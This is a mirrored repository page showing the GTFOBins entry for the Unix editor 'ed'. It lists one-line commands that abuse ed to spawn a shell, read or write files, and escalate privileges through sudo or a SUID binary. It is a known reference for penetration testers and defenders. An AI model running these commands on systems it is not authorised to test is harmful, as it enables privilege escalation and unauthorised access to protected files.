This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2025-12-28 03:01:42 +01:00
Code
Issues
08dfd05aee
GTFOBins.github.io
/
_gtfobins
/
ed.md
Nick Blekherman
3065294305
Add ./ to SUID category in ed.md
2021-01-18 09:41:36 +02:00
432 B
Raw
Blame
History
functions
shell
file-write
file-read
suid
sudo
limited-suid
code
ed !/bin/sh
code
ed file_to_write a DATA . w q
code
ed file_to_read ,p q
code
./ed file_to_read ,p q
code
sudo ed !/bin/sh
code
./ed !/bin/sh